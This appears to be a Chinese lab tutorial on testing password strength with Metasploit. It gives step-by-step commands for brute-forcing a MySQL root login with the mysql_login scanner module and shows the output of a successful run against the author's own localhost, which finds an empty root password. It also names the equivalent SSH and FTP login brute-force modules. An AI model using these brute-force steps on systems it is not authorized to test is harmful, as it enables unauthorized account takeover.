Metasploit之口令安全
这里测试的是MySQL数据库的口令安全
首先,我们的靶机上需要开启MySQL数据库(破解本地才需要这样)
回想:当初启动ssh的命令:service ssh start,那么启动MySQL:service mysql start
同理:查看相关命令启动状态:service ssh ststus,MySQL查看状态:service mysql ststus
得到:Active: active (running),即证明开启成功
------------------------------------------------------------------------------------------------
远程MySQL爆破步骤:
metasploit下进行操作
search mysql_login -->搜索相关MySQL登陆的模块,得到auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login -->使用这个模块
show options -->查看配置选项,这里的选项比较多,逐一解释
PASSWORD,设置密码;PASS_FILE,设置密码文件;USERNAME,设置账户;USERPASS_FILE,设置账户文件
set RHOSTS 192.168.2.149 -->设置目标主机IP
set USERNAME root -->设置爆破的账户为root
set PASS_FILE /root/1.txt -->设置爆破密码文本
set THREADS 10 -->设置线程数
show options -->最后查看我们的设置成功没有
exploit -->开始运行攻击破解MySQL密码
PS:这里我是kali-linux2.0去破解我的Windows2003的MySQL出了点错误
回显:版不支持mysql 3306目标检测
我又重新设置了目标IP
set RHOSTS 127.0.0.1 -->设置攻击对象为本地的MySQL数据库,之前启动过MySQL的服务的
exploit -->开始运行攻击破解MySQL密码
回显:[+] 127.0.0.1:3306 - MYSQL - Success: 'root:'
PS:成功爆破,账号root,密码空
------------------------------------------------------------------------------------------------
PS:kali-linux连接MySQL命令
mysql -u root -p -->连接MySQL,回显:Enter password:(输入密码,我的本地为空,直接回车)
本章节同样的道理
search ssh_login -->搜索ssh的登陆爆破模块
auxiliary/scanner/ssh/ssh_login -->ssh登陆口令
auxiliary/scanner/ssh/ssh_login_pubkey -->ssh登陆的公共密匙
search ftp_login -->搜索FTP的登陆爆破模块
auxiliary/scanner/ftp/ftp_login -->FTP登陆口令
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论